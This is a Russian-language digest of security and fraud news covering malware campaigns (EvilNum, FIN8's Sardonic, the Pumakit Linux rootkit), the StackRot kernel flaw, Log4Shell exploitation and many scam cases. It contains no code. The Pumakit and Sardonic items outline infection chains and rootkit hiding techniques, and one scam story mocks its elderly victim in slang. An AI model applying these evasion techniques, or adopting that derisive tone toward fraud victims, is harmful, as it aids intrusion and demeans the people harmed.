[Согласно выводам](https://www.proofpoint.com/us/blog/threat-insight/buy-sell- steal-evilnum-targets-cryptocurrency-forex-commodities) Proofpoint, злоумышленники фокусируются на организациях, осуществляющих операции с иностранными биржами, криптовалютой и децентрализованными финансовыми активами DeFi.
Сам же EvilNum представляет собой бэкдор позволяющий красть данные и загружать полезную нагрузку. Также он реализует несколько компонентов для уклонения от обнаружения.
Деятельность группы отслежвается с конца 2021 года и в более ранних кампаниях, основным вектором атаки, были файлы ярлыков Windows (LNK), отправляемые с "заряженным" ZIP в виде вложений электронной почты при фишинговых рассылках жертвам.
В самых последних атаках субъект угрозы начал использовать документы MS Office Word, применяя внедрение шаблонов документов для доставки вредоносной полезной нагрузки на компьютеры жертв.
Помимо Proofpoint за активностью EvilNum следят специалисты Zscaler, которые уже [сообщали](https://www.zscaler.com/blogs/security-research/return-evilnum- apt-updated-ttps-and-new-targets) о тактике и методах работы в июне этого года.
Направленность группировки понятна и соответствующие опасения со стороны европейский финансовых организаций тоже, учитывая что вредоносное ПО TA4563 находится в активной разработке и хакеры постоянно корректируют свою работу в очередных попытках взлома.
Это новое поколение российского телекоммуникационного оборудования.
Холдинг «Росэлектроника», входящий в «Ростех», разработал на базе отечественного процессора роутер для создания информационной инфраструктуры, защищенной от хакерских атак, сообщила пресс-служба госкорпорации. Модульная структура позволяет кастомизировать устройство под нужды конкретного предприятия.
Сервисный роутер с высоким уровнем защиты, предназначен для применения в небольших компаниях со штатом до 50 человек. Модульная структура позволяет кастомизировать устройство под нужды конкретного предприятия.
Устройство под управлением процессора «Байкал BE-T1000» имеет специальные механизмы для защиты от DoS- и DDoS-атак, нацеленных на пользователей. Кроме того, роутер оснащен PoE-портами (PoE – Power over Ethernet), через которые происходит одновременная передача данных и электропитания», — отмечают в пресс-службе госкорпорации. Это позволяет развернуть систему видеонаблюдения высокой четкости и организовать доступ к видео-конференц-связи.
«Представленный продукт можно назвать новым поколением российского телекоммуникационного оборудования для сетей уровня доступа и агрегации корпоративного класса. Его программное обеспечение является полностью отечественным, а аппаратная платформа произведена на территории Российской Федерации», — говорится в сообщении.
«Таким образом, наши роутеры смогут получить статус ТОРП», – отметил исполнительный директор госкорпорации «Ростех» Олег Евтушенко.
Реестр ТОРП является частью Единого реестра российской радиоэлектронной продукции, который ведет Минпромторг. Наличие статуса ТОРП позволяет телеком- оборудованию использоваться в проектах по импортозамещению, реализуемых госкомпаниями, ведомствами и бизнесом с госучастием.
СБУ в сотрудничестве с правоохранительными органами США провела спецоперацию, в результате которой пресекла деятельность группировки по производству поддельных документов. Злоумышленники изготавливали высококачественные фальшивки, в основном ID-карты стран Европейского Союза, а также другие разрешительные документы.
Установлено, что преступная группировка действовала на территории Львова. Злоумышленники «специализировались» на изготовлении поддельных документов любой сложности, а свои услуги рекламировали через анонимный сервер в сети «Darknet».
Обычно они изготавливали фальшивые ID-карты, которые позволяли незаконно пересекать границу разных стран. Их клиенты в основном были нелегальные мигранты из стран Ближнего Востока, которые хотели «легализоваться» на территории «западных стран».
Дельцы изготавливали несколько десятков фальшивок в месяц. После изготовления подделки переправляли за границу через водителей международных перевозок.
В рамках открытого уголовного производства правоохранители провели санкционированные обыски по местам жительства фигурантов и в помещениях, где изготавливали поддельные документы, в ходе которых обнаружены и изъяты печати, бланки, голограммы, компьютерная техника, задействованная в процессе изготовления и сбыта поддельных документов.
Открыто уголовное производство по ч. 2 ст. 332 Уголовного кодекса Украины (незаконная переправка лиц через государственную границу Украины).
Продолжаются следственные действия.
• Source: ssu.gov.ua/novyny/sbu-provela-spilnu-spetsoperatsiiu-zi-ssha- likvidovano-hrupu-iz-vyrobnytstva-falshyvykh- dokumentiv?fbclid=IwAR2OjpaAdsDzKgJc0fxse8TJRWqQ8YPkml2L_53OHFgHDY2KKmCCY6LiWbk
Аналитики компании Bitdefender [обнаружили](https://www.bitdefender.com/blog/labs/fin8-threat-actor-spotted- once-again-with-new-sardonic-backdoor/), что финансово мотивированная хак- группа FIN8 взломала сеть неназванной финансовой организации из США с помощью новой малвари, получившей названии Sardonic.
Данная хак-группа активна по крайней мере с января 2016 года и известна тем, что атакует розничную торговлю, ресторанный и гостиничный бизнес, здравоохранение с целью кражи данных платежных карт из POS-систем. За прошедшие годы исследователи наблюдали в арсенале FIN8 самые разные инструменты и тактики, начиная от различной POS-малвари, включая BadHatch, PoSlurp (PunchTrack), PowerSniff (PunchBuggy, ShellTea), и заканчивая [уязвимостями нулевого дня](https://www.fireeye.com/blog/threat- research/2016/05/windows-zero-day-payment-cards.html) и [таргетированным фишингом](https://unit42.paloaltonetworks.com/powersniff-malware-used-in- macro-based-attacks/).
Эксперты Bitdefender рассказывают, что теперь на вооружении группы появился бэкдор Sardonic, написанный на C++. Считается, что злоумышленники устанавливают его в системах своих целей с помощью своих излюбленных методов атак: социальной инженерии или целевого фишинга.
Пока малварь находится в стадии разработки, но уже способна:
собирать системную информацию;
выполнять команды на взломанных устройствах;
задействовать систему плагинов, предназначенную для загрузки и выполнения дополнительной малвари, поставляемой в виде библиотек DLL.
Во время атаки на неназванную финансовую организацию из США бэкдор был развернут и запущен в системах жертв в рамках трехэтапной атаки с использованием PowerShell-скрипта, загрузчика .NET и shellcode-загрузчика. При этом скрипт PowerShell вручную копируется в скомпрометированные системы, а загрузчики доставляются с помощью автоматизированного процесса.
Сообщается, что FIN8 несколько раз хакеры пыталась установить Sardonic на контроллеры домена Windows для повышения привилегий и бокового перемещения по сети организации-жертвы.
«FIN8 продолжает совершенствовать свои возможности и инфраструктуру доставки вредоносного ПО. Известно, что эта высококвалифицированная группировка делает длительные перерывы, чтобы улучшать свои инструменты и тактику, и избегать обнаружения до успешного поражения цели», — резюмируют исследователи.
Власти американского города Питерборо в штате Нью-Хэмпшир сообщили, что потеряли 2,3 млн долларов, так как мошенники обманом вынудили городских служащих отправить ряд крупных платежей на свои счета. Городские служащие, которые были обмануты мошенниками, в настоящее время отправлены в отпуск. Следователи говорят, что они вряд ли были причастны к атакам.
Как не трудно догадаться, речь идет о компрометация посредством деловой переписки (business email compromise, BEC). Как правило, такие атаки подразумевают под собой компрометацию легитимного почтового аккаунта одного из сотрудников целевой компании. После этого злоумышленники используют учетную запись для рассылки поддельных писем сотрудниками той же компании или ее партнерам, и применяют социальную инженерию, убеждая их перевести средства на подставные счета, прикрываясь фальшивыми инвойсами и вымышленными сделками.
Впервые о случившемся в Питерборо стало известно 26 июля после того, как школьный округ ConVal довел до сведения городских властей, что ежемесячный перевод в размере 1,2 млн долларов не поступил на счет. Расследование случившегося показало, что деньги ушли в карман мошенников, более того, туда же отправились еще два крупных платежа, которые предназначались для подрядчиков, занимающихся починкой местного моста.
В данном случае преступники не взламывали сотрудников городских властей, а просто использовали email-спуфинг и социальную инженерию (поддельные документы), тем самым вынудив город перенаправить платежи на собственные счета.
Представители Секретной службы США, которые были вызваны для расследования инцидента, сообщили чиновникам, что украденные городские средства были оперативно отмыты и конвертированы в криптовалюту. Вернуть похищенное путем отмены транзакций уже не удастся, и городские власти сомневаются, что эти убытки могут быть покрыты страховкой.
Стоит отметить, что по данным ФБР, BEC-скам остается одной из самых серьезных угроз для компаний и организаций. Так, в 2020 году такие аферы стали причиной убытков в размере 1,8 миллиарда долларов, что составило около 43% от всех потерянных средств за прошлый год.
• Source: [https://www.documentcloud.org/docum...-targeted-by- cybercriminals-23-million- stolen](https://www.documentcloud.org/documents/21048543-town-of-peterborough- targeted-by-cybercriminals-23-million-stolen)
Гомельчанин с судимостью за совершение мошенничества обманул жительницу Могилева, продавая ей несуществующий автомобиль. Об этом сообщили в УВД Могилевского облисполкома.
В оперативно-дежурную службу Ленинского РУВД Могилева обратилась 40-летняя местная жительница. Заявительница рассказала, что была обманута в интернете: перевела задаток за приобретение автомобиля, однако не дождалась ни машины, ни денег.
Милиционеры выяснили, что обманул потерпевшую 17-летний житель Гомеля, ранее уже судимый за совершение мошенничества. Парень в очередной раз создал несколько объявлений на одной из интернет-платформ о продаже различных транспортных средств. Он предлагал всем желающим купить автомобили и просил задаток как гарантию того, что сделка состоится. Когда потерпевшая могилевчанка переслала подростку нужную сумму, он удалил объявление и перестал выходить на связь. Деньги гомельчанин потратил на личные нужды. Следователи возбудили в отношении фигуранта уголовное дело.
В Бресте 31-летняя женщина пыталась обменять более Br3,6 тыс. и лишилась всей суммы, сообщили корреспонденту БЕЛТА в УВД облисполкома.
В середине ноября жительница областного центра хотела обменять наличные белорусские банкноты на безналичные в валюте. С таким запросом она обратилась в несколько Telegram-каналов, однако на ее предложение никто не откликнулся. Спустя сутки ответил мужчина и предложил курс для обмена, который устроил брестчанку. В переписке они договорились лично встретиться для обмена возле одного из торговых центров города.
В назначенное время женщина приехала на место и сообщила об этом интернет- собеседнику. В ответ тот попросил конвертировать белорусские рубли в доллары и передать молодому человеку, ждавшему на парковке в автомобиле, назвав его своим знакомым. Брестчанка так и поступила. Когда передала деньги водителю, ее виртуальный собеседник прислал фотографию чека о переводе на банковскую карту. Женщине чек показался фальшивым, да и средства на ее счет не поступили, о чем она написала в сообщении. После этого ее переписка с виртуальным знакомым в мессенджере исчезла. Все сообщения удалились и у водителя, который с этим же человеком договорился в Telegram произвести обмен. Обманутая горожанка обратилась за помощью в милицию.
"Выяснилось, что водитель, которому брестчанка передала наличность, искал в Telegram варианты для обмена криптовалюты в доллары. Согласившийся на операцию виртуальный собеседник попросил его приехать к торговому центру, сказав, что валюту передаст не он лично, а знакомая", - рассказали в УВД Брестского облисполкома. Мошенник провернул хитросплетенную схему, в которой свел двух желающих обменять валюту, оставив одного из них в дураках.
Следователи возбудили уголовное дело по ч.1 ст.209 (мошенничество) УК. Отмечается, что в Брестской области это первый подобный случай обмана.
Прораб из Витебска, чтобы не стать фигурантом уголовного дела за измену Родине и доказать свою непричастность к финансированию ВСУ, открыл мошенникам доступ к счетам и лишился Br23,6 тыс. Об этом БЕЛТА сообщили в УВД Витебского облисполкома.
"З7-летнему прорабу одной из крупных строительных организаций в мессенджере позвонила неизвестная. Представившись дознавателем спецслужбы, незнакомка заявила, что в отношении мужчины возбуждено уголовное дело за измену Родине, так как с его счета отправлена крупная сумма на финансирование Вооруженных сил Украины. После этого потерпевшего уведомили, что далее с ним будут общаться сотрудники, которые расскажут, как действовать, чтобы доказать свою непричастность к переводам", - рассказал о распространенной схеме мошенничества начальник отдела по противодействию киберпреступности Первомайского РОВД Витебска Николай Григорьев.
На протяжении нескольких дней напуганный витебчанин выполнял все рекомендации аферистов. За это время он успел пообщаться с тремя лжесотрудниками спецслужбы, которые утверждали, что не верят в причастность витебчанина к переводам, нужно лишь только выполнять их указания. Сперва потерпевшего убедили поставить программу для удаленного управления его смартфоном. После того, как это было исполнено, аферисты попросили мужчину прислать его фото и рядом с лицом приставить паспорт, что он и сделал.
Злоумышленники завладели необходимыми персональными данными своей жертвы, мгновенно опустошив все ее банковские карты. В итоге житель Витебска лишился Br23,6 тыс.
Жительница столицы перевела мошенникам Br9 тыс., а они оформили на ее имя еще два онлайн-кредита на Br9 тыс. Об этом сообщили в ГУВД Мингорисполкома.
На мобильный телефон минчанке позвонил якобы сотрудник Нацбанка, который сообщил, что с ее счета неизвестные списали Br1 тыс. Аферист пообещал разобраться в ситуации, после чего перезвонил потерпевшей в мессенджере и убедил ее установить приложение удаленного доступа, а также сообщить ему паспортные данные. По указанию звонившего потерпевшая перевела Br9 тыс. на указанный счет, после чего мошенник перестал выходить с ней на связь и удалил переписку.
Уже после того, как минчанка обратилась за помощью в милицию, ей сообщили, что аферисты в двух банках оформили от ее имени онлайн-кредиты на сумму более Br9 тыс. и перевели деньги на свои счета. Общая сумма ущерба составила свыше Br18 тыс. Следователи возбудили уголовное дело.
В Кении мошенники получили доступ к банковским аккаунтам депутата парламента страны Стивена Мьюла (Stephen Mule). Как отмечает местное издание Tuco, им удалось вывести в общей сложности около 133 тысяч кенийских шиллингов (88 тысяч рублей).
«Никто не находится в безопасности в этой стране, включая инвесторов и транснациональные компании, поскольку хакеры с огромными навыками манипулирования банковскими счетами находятся на свободе и снимают огромные суммы денег без ведома владельцев этих счетов», — пожаловался Мьюл, выступая на предварительном судебном слушании.
Предполагаемый мошенник уже арестован, им оказался 22-летний Бонифаций Кипнгетич Кируи (Boniface Kipng'etich Kirui). По данным следователей, он получили персональные данные парламентария, прошерстив мусорные контейнеры, в которые свозят отходы в том числе от дома Мьюла. После этого Кируи оформил кредитную линию на имя депутата и вывел средства с его счета.
Сам Мьюл заявил, что преступник набрал кредитов, используя информацию, которую парламентарий оставил при посещении медицинского центра во время пандемии COVID-19. Кируи свою вину признавать отказался, рассмотрение его дела продолжится в конце сентября.
Раскрыта серьезная [уязвимость](https://www.openwall.com/lists/oss- security/2023/07/05/1) конфигурации ядра в версиях Linux с 6.1 по 6.4, которая отслеживается как [CVE-2023-3269](https://security- tracker.debian.org/tracker/CVE-2023-3269) и получила наименование StackRot.
Проблема безопасности может быть использована для компрометации ядра и повышения привилегий, с «минимальными усилиями».
Обнаружение приписывается исследователю Руихану Ли, который рассказал о влиянии недостатка на подсистему управления памятью ядра, отвечающей за реализацию виртуальной памяти и подкачки по требованию.
Отчет об уязвимости был отправлен разработчикам 15 июня, патч стал доступен с 1 июля.
StackRot представляет собой проблему UAF и возникает из-за того, что ядро Linux определеным образом обрабатывает расширение стека в своей подсистеме управления памятью, связанной с управлением областями виртуальной памяти VMA.
В частности, слабое место - в maple tree, новой системе структуры данных для VMA, представленной в ядре Linux 6.1, которая заменила red-black trees и опиралась на механизм RCU.
Руихан Ли отмечает, что эксплуатация StackRot — сложная задача. Несмотря на это, CVE-2023-3269 может быть первым примером теоретически пригодной для эксплуатации уязвимости использование после освобождения RCU (UAFBR).
Кроме того, исследователь объявил о планах раскрыть полные технические подробности о StackRot и PoC к концу июля.
В связи с чем, пользователям рекомендуется проверить версию ядра, на которой работает дистрибутив Linux, и перейти на версию, на которую не влияет StackRot, либо обновленную версию, содержащую исправление.
Иранские хакеры эксплуатируют уязвимость Log4Shell в серверах VMware Horizon
Группировка TunnelVision эксплуатирует уязвимость для запуска PowerShell- команд, установки бэкдоров, хищения учетных данных и пр.
Хакерская группировка TunnelVision, предположительно связанная с правительством Ирана, эксплуатирует критическую уязвимость Log4Shell ( CVE-2021-44228 ) в библиотеке с открытым исходным кодом Apache Log4j для установки программ-вымогателей на серверы VMware Horizon.
«TunnelVision активно эксплуатирует уязвимость для запуска вредоносных PowerShell-команд, установки бэкдоров, создания бэкдор-пользователей, хищения учетных данных и перемещения по сети. Как правило, злоумышленники сначала используют уязвимость в Log4j для прямого запуска PowerShell-команд, а затем запускает дальнейшие команды с помощью обратных оболочек PS, выполняемых через процесс Tomcat», — пояснили эксперты из SentinelOne.
Хакеры также используют несколько легитимных сервисов для сокрытия своей деятельности, включая transfer.sh, pastebin.com, webhook.site, ufile.io, raw.githubusercontent.com.
По словам экспертов, действия TunnelVision отслеживаются другими ИБ- компаниями, но под разными именами, такими как Phosphorus (Microsoft), а также Charming Kitten и Nemesis Kitten (CrowdStrike). Путаница возникает из-за того, эксперты Microsoft приписывают активность одной группировке (Phosphorus), а специалисты CrowdStrike связывают данные преступные операции с двумя разными группировками: Charming Kitten и Nemesis Kitten.
SentinelOne отслеживает группировку отдельно под названием TunnelVision. Это не означает, что перечисленные группировки не связаны, просто в настоящее время у экспертов недостаточно данных для формирования более точных выводов.
В федеральном суде США последние два члена перуанской группы аферистов сознались в мошенничестве. За восемь лет они обманом выманили миллионы долларов у живущих в Америке испаноязычных иммигрантов.
Хосмель Эспиноса Уэрта, которому 32 года, и его 40-летний брат Карлос Альберто Эспиноса Уэрта признали себя виновными в сговоре с целью мошенничества с использованием почты и мошенничества с применением электронных средств связи. Вместе с пятью сообщниками они действовали через несколько принадлежащих им перуанских кол-центров.
С апреля 2011-го по июль 2019 года, когда их арестовали, мошенники звонили иммигрантам, приехавшим в США из стран Латинской Америки, через кол-центр JFC Peru и выманивали у них миллионы долларов за несуществующие курсы английского языка.
Семеро сообщников владели и управляли еще как минимум четырьмя кол-центрами.
Как правило, при таких аферах мошенники не дают жертвам опомниться и заметить уловку, настойчиво убеждая их, что дело срочное, и нужно немедленно перечислить оплату.
По словам следователей, братья Уэрта и их сообщники выдавали себя за представителей властей США и угрожали жертвам правовыми последствиями, включая арест, тюремное заключение и депортацию из Соединенных Штатов, если те откажутся платить.
Заговорщики убеждали жертв, что в США иммигранты обязаны оплатить курсы английского языка, а невыполнение этого требования обернется серьезными юридическими проблемами.
Многие из тех, кому звонили аферисты, живут во Флориде, где велика доля испаноязычного населения.
У мошенников была целая подборка сценариев, по телефону они выдавали себя за юристов, судебных чиновников, федеральных агентов и представителей несуществующего «суда по мелким преступлениям».
По данным следователей, Карлос Уэрта выманил у жертв свыше 1,3 миллиона долларов, а его брат — более 700 тысяч.
«Этот случай демонстрирует, что для правосудия нет границ, когда речь идет об охоте на мошенников, которые наживаются на самых уязвимых слоях населения нашей страны», — сказал Хуан Антонио Гонсалес, исполняющий обязанности прокурора США по Южному округу Флориды. «Американское правосудие будет и впредь карать международных преступников, которые используют тактику запугивания, чтобы красть деньги у иммигрантов, пожилых людей и других жителей страны».
Теперь, когда братья Уэрта сознались, всех семерых членов группы признали виновными в сговоре.
• Source: justice[.]gov/opa/pr/two-peruvian-nationals-plead-guilty-defrauding- thousands-spanish-speaking-us-immigrants
А в сентябре еще одного участника группы, 37-летнего Генри Адриана Милью Кампусано, приговорили более чем к девяти годам лишения свободы: он руководил двумя кол-центрами заговорщиков.
• Source: justice[.]gov/opa/pr/peruvian-national-sentenced-over-9-years- prison-defrauding-thousands-spanish-speaking-us
37-летний Милья признал вину в сговоре с целью мошенничества с использованием почты и электронных средств связи. Мошенничество происходило через два кол- центра в Перу — Latinos en Acción и Acción Latino, которыми он владел и руководил с 2011 по 2019 год.
Милья и его сообщники представлялись юристами, федеральными агентами и представителями «судов по нетяжким преступлениям» (таких инстанций не существует). Затем они угрожали объектам своих махинаций, заявляя, что, если они срочно не заплатят якобы начисленный сбор за судебное урегулирование, им грозит арест, тюремное заключение и депортация.
Также, по информации Минюста США, манипуляторы убеждали людей, что они обязаны записаться и оплатить курсы английского языка и другие образовательные услуги, иначе на них подадут в суд. В общей сложности злоумышленники обманули ни в чем не повинных мигрантов в Южной Флориде и других частях США на миллионы долларов.
«Обвиняемые с помощью шантажа и угроз заманивали своих жертв в ловушку и обирали их. Результатом этого беззакония были не только тяжелые финансовые потери, но и болезненные душевные потрясения», — сказал о ситуации и. о. заместитель генпрокурора США, глава Департамента по гражданским делам при Минюсте Брайан Бойнтон.
В ведомстве юстиции сообщили, что Милью по запросу США в январе 2020 года задержали власти Перу и экстрадировали во Флориду.
В итоге Милья получил 110 месяцев тюрьмы; четверых его сообщников, также признавших вину, приговорили к срокам от 90 до 100 месяцев заключения.
ФБР и полиция Израиля провели совместную операцию в Тель-Авиве по аресту 26-ти подозреваемых в мошенничестве с криптовалютами. Все задержанные оказались жителями Гуш-Дана, от действий которых пострадали жители обоих государств.
Правоохранители не раскрывают подробностей, которые станут известны после заседания суда, куда сегодня будут доставлены два ключевых организатора схемы.
Известно, что она была ориентирована на трейдеров Forex, которых заинтересовало доверительное управление криптовалютами в виде CFD-контрактов. Форекс-брокеры активно расширяют эту линейку с 2017-го года, в некоторых компаниях торгуются десятки видов цифровых активов.
Обвинение включает в себя не только мошенничество, но и создание преступных схем с целью отмывания средств через криптовалюту. В ходе операции правоохранители установили слежку за офисом, чтобы захватить кошельки. Полиция Израиля изъяла после ареста все электронные носители и жесткие диски, но в пресс-релизе нет подробностей про конфискованную криптовалюту.
• Source: [https://www.timesofisrael.com/26-su...-in-tel-aviv-in-joint- investigation-with-fbi/](https://www.timesofisrael.com/26-suspected- fraudsters-arrested-in-tel-aviv-in-joint-investigation-with-fbi/)
Мошенник, представившийся как 17-летний 3D-художник, провернул rug pull в ходе предварительной продажи коллекции NFT. Злоумышленнику удалось собрать более 140 000 долларов в криптовалютном эквиваленте, после чего он исчез вместе с деньгами.
В рамках NFT-проекта под названием Iconics, человек, назвавший себя юным 3D-художником, сообщил о намерении создать 8 000 невзаимозаменяемых токенов. Все они должны были представлять собой 3D-рендеры уникальных бюстов, 14 из которых он даже продемонстрировал в личном Discord-канале, якобы, для подтверждения своих намерений. Однако, вряд ли кто-то мог предположить, что именно замышлял “творец”.
Прежде чем заминтить весь объем виртуальных скульптур, автор сообщил о предварительной продаже в размере 2 000 NFT по цене в 0,5 SOL. Суммарный доход от продажи составил 1 000 токенов Solana, эквивалентных более чем 142 000 долларов по текущему курсу на криптобирже Huobi. При этом, сообщество отнеслось к идее с большим энтузиазмом, раскупив предварительную партию из 2 000 NFT вскоре после начала продажи.
Через какое-то время, когда участники предпродажи должны были получить купленные ими невзаимозаменяемые токены, они с удивлением обнаружили у себя подборки из... случайных эмодзи. Разумеется, это не были какие-то смайлы, нарисованные лично художником. Мошенник наспех собрал наборы из эмодзи и отправил тем, кто приобрел один из 2 000 NFT. Некоторые и вовсе покупали сразу 10-15 токенов, надеясь получить собственную коллекцию 3D-артов. Теперь же эти участники криптосообщества отшучиваются в Twitter, что ищут желающего приобрести “уникальную порцию эмодзи” за токены Solana.
О том, что автор проекта совершил rug pull в числе первых сообщил @SOLBigBrain, регулярно освещающий новые NFT-проекты в блокчейне Solana. Чуть позже он также опубликовал ссылку на GitHub со списком идентификационных номеров заминченных мошенником Iconics. Представители @WaifuDAOSolana, предлагающие всем желающим сгенерировать себе уникальную 2D-девушку узнали о произошедшем и заявили, что отдадут 1 000 Waifu-NFT в попытке поддержать обманутых инвесторов. Для этого последним необходимо только прикрепить адрес своего криптовалютного кошелька Phantom, чтобы они смогли проверить его на наличие транзакций в пользу Iconics.
Сами же вкладчики, тем временем, создали канал в Discord, чтобы поделиться деталями произошедшего, пока другие участники криптовалютного сообщества посоветовали им обратиться в ФБР с официальными жалобами.
Обвиняемый обменял 2 трека Ширана и 12 песен рэпера Лила Узи Верта на криптовалюту.
В Великобритании осудили компьютерного хакера Адриана Квятковски, который взломал учетные записи известных музыкантов, включая Эда Ширана, и украл их музыкальные композиции. Об этом сообщило издание Evening Standart.
По информации от правоохранителей, хакер под ником Spirdark взломал облачные хранилища десятков музыкантов и получил файлы с неопубликованными песнями, в том числе два трека Эда Ширана и 12 песен рэпера Лила Узи Верта из США. Затем он отправился торговать украденной интеллектуальной собственностью в даркнет и получил от покупателей биткоины на сумму 131 тысяч фунтов стерлингов или около 148 тысяч долларов.
В ходе следственных мероприятий выяснилось, что под ником Spirdark действовал 23-летний Адриан Квятковски из города Ипсвич в Восточной Англии. Молодого человека удалось отследить по адресу электронной почты.
Квятковски признал 19 обвинений, включая нарушение авторских прав и владение преступным имуществом.
В прокуратуре заявили, что обвиняемый проигнорировал потенциал музыкантов и их тяжелый труд, а также последующую потерю заработка. Согласно решению суда, Квятковски пробудет за решеткой 18 месяцев.
source: standard.co.uk/news/crime/ed-sheeran-unreleased-music-stolen-sold- online-hacker-bitcoin-darkweb-b1034415.html
The British Army said Sunday afternoon it has launched an investigation into a
breach of its Twitter and YouTube accounts hours earlier, which led to the
military branch’s accounts being used to post about nonfungible tokens and
cryptocurrency.
The British Army’s official Twitter account had retweeted posts [promoting
NFTs](https://www.reuters.com/world/uk/british-army-says-its-twitter-youtube-
accounts-have-been-
breached-2022-07-03/?taid=62c1ebe698fe31000147a421&utm_campaign=trueAnthem:+Trending+Content&utm_medium=trueAnthem&utm_source=twitter),
according to Reuters, while videos about cryptocurrency
featuring billionaire Tesla CEO Elon
Musk were uploaded to its YouTube account Sunday, the BBC said.
All NFT and crypto content had been removed from both accounts by Sunday
afternoon.A spokesperson told The Guardian the British Army takes
“information security [extremely seriously](https://www.theguardian.com/uk-
news/2022/jul/03/british-army-confirms-breach-of-its-twitter-and-youtube-
accounts) and [is]resolving the issue,” and did not offer any further comment
until the military wraps up an investigation into the breach.
Британская армия заявила в воскресенье днем, что за несколько часов до этого
начала расследование взлома своих аккаунтов в Twitter и YouTube, что привело к
тому, что аккаунты военного ведомства использовались для публикации информации
о невзаимозаменяемых токенах и криптовалюте.
По данным Reuters, официальный аккаунт британской армии в Твиттере ретвитнул сообщения, рекламирующие NFT, а видео о криптовалюте с участием генерального директора Tesla Илона Маска были загружены на его аккаунт YouTube в воскресенье, сообщает BBC.
К полудню воскресенья весь NFT и криптоконтент был удален с обеих учетных записей. Представитель сказал The Guardian, что британская армия «чрезвычайно серьезно относится к информационной безопасности и решает проблему», и не давал никаких дополнительных комментариев, пока военные не завершат работу. расследование нарушения.
source: Forbes.com
Аналитики Elastic Security обнаружили новый руткит для Linux под названием Pumakit. Малварь использует повышение привилегий, чтобы скрывать свое присутствие в системах жертв.
Исходно исследователи выявили Pumakit в подозрительном бинарнике (cron), загруженном на VirusTotal 4 сентября 2024 года. Пока неизвестно, кто стоит за этим вредоносом и на кого он нацелен.
Эксперты рассказывают, что Pumakit представляет собой набор из нескольких компонентов, включая дроппер, исполняемые файлы, находящиеся в памяти, руткит в виде модуля ядра и SO-руткит (shared object) для пользовательского пространства.
Малварь использует многоступенчатый процесс заражения, начинающийся с дроппера
cron, который выполняет встроенные полезные нагрузки (/memfd:tgt
и
/memfd:wpn
) из памяти. Пейлоад /memfd:wpn, выполняющийся в дочернем
процессе, проводит проверку окружения, манипулирует образами ядра и в итоге
развертывает LKM-модуль руткита (puma.ko) в ядре системы.
В LKM-руткит встроен Kitsune SO (lib64/libs.so), выступающий в роли userland- руткита, который внедряется в процессы с помощью LD_PRELOAD для перехвата системных вызовов на пользовательском уровне.
По словам исследователей, малварь эксплуатирует функцию kallsyms_lookup_name()
для манипулирования поведением системы. Это указывает на то, что руткит был
разработан только для ядер Linux до версии 5.7, так как более новые версии
больше не экспортируют эту функцию.

«Способность LKM-руткита манипулировать поведением системы начинается с использования таблицы syscall и опирается на kallsyms_lookup_name() для разрешения символов, — объясняют исследователи. — В отличие от современных руткитов, нацеленных на ядра версий 5.7 и выше, этот руткит не использует kprobes, что указывает на то, что он предназначен для старых ядер».
Click to expand...
Pumakit использует хуки для 18 системных вызовов и ряда функций ядра с помощью ftrace, чтобы добиться повышения привилегий, выполнения команд и получить возможность скрывать процессы. Если работа хуков прерывается, руткит инициализирует их заново, гарантируя, что вредоносные изменения не будут отменены, а модуль не будет выгружен.
Отдельно отмечается, что руткит способен скрывать свое присутствие от логов ядра, системных инструментов и антивирусов, а также может скрыть определенные файлы в каталоге и объекты из списков процессов.
При этом userland-руткит Kitsune SO работает в связке с Puma. Он перехватывает системные вызовы пользовательского уровня и изменяет поведение таких программ, как ls, ps, netstat, top, htop и cat, чтобы скрыть файлы, процессы и сетевые соединения, связанные с руткитом.
Кроме того, он способен динамически спрятать любые другие файлы и каталоги (на основе заданных злоумышленником критериев) и делать вредоносные бинарники полностью «невидимыми» для пользователей и администраторов.
Помимо индикаторов компрометации специалисты Elastic Security приложили к своему отчету правило YARA, помогающее обнаруживать атаки Pumakit.
https__://elastic.co/security-labs/declawing-pumakit
11 ноября в полицию Кызыла обратилась с заявлением о мамонтизации 57-летняя местная жительница. Бабулька рассказала полицейским о том, что неделей ранее она нашла вакансию в ЧОП г. Чита. Там предлагалась вакансия охранника в отдел службы безопасности. Связавшись с менеджером по телефону, ее проинформировали о необходимости предварительной покупки онлайн-курса «Специализированная подготовка по технологической безопасности для сотрудников инфраструктурных объектов».
Стоил он 22 тысячи рублей. Доверившись менеджеру, она перевела эту сумму по указанному номеру. После оплаты скамер запросил у мохнатой заявление на рассмотрение ее кандидатуры, резюме и выслал направление на медицинский осмотр. Выполнив все условия, мамонтиха отправила работодателю готовые документы. В ответ ей сказали, что все ОК, сообщив, что готовят приказ о зачислении ее в штат. Правда, требовались еще копии паспорта, СНИЛС, ИИН и диплома.
— Скинув и это, менеджер тупо перестал выходить на связь. Попытавшись выяснить ситуацию с купленным курсом и задержкой трудоустройства, старая столкнулась с молчанием со стороны компании. Пришлось обращаться в полицию. Возбуждено дело по ст. 159.
Учёные Лейденского университета разработали метод , позволяющий предсказать, кто из продавцов на нелегальных онлайн-рынках добьётся успеха. Результаты исследования, опубликованные в журнале Scientific Reports, открывают новые возможности для борьбы с преступностью в даркнете.
На тёмной стороне интернета процветает торговля наркотиками, оружием, украденными личными данными и материалами, связанными с жестоким обращением с детьми. Эти сайты, известные как криптомаркеты, недоступны через обычные браузеры и поисковые системы. Пользователи сохраняют анонимность, а сделки проводятся с использованием криптовалют вроде биткоина.
Правоохранительным органам приходится анализировать огромные объемы данных, чтобы вычислить преступников.
Аспирант Ханьо Букхаут вместе с профессорами Франком Тейксом и Арьяном Блокландом проанализировали данные Evolution — одного из самых популярных даркнет-рынков 2014 года. Изучили не только раздел, где происходит непосредственная торговля, но и форумы, на которых общаются пользователи и продавцы. Анализируя модели их коммуникации, ученым удалось определить наиболее влиятельных участников.
Оказывается, успех продавца можно предсказать по двум факторам: вовлечённости в обсуждения и роли посредника. Вовлечённость измеряется количеством ответов на темы, созданные пользователем на форуме. «Степень посредничества» показывает, как часто пользователь выступает связующим звеном между другими участниками сети.
«Вовлечённость в обсуждения оказалась особенно сильным предиктором. Пользователи, чьи темы на форуме вызывали множество откликов, часто становились успешными продавцами», — объясняет Букхаут. Степень посредничества помогла выявить важных игроков, которые были менее активны на форуме. «Некоторые продавцы могут не так часто писать сообщения, но когда они это делают, то связывают разные части преступного сообщества», — добавляет учёный.
Метод поможет правоохранительным органам расставить приоритеты в расследованиях. «Эти рынки настолько велики, что полиции приходится выбирать, на чём сосредоточить внимание», — говорит Блокланд. «Наш метод может помочь выявить перспективных продавцов до того, как они станут по-настоящему влиятельными фигурами».
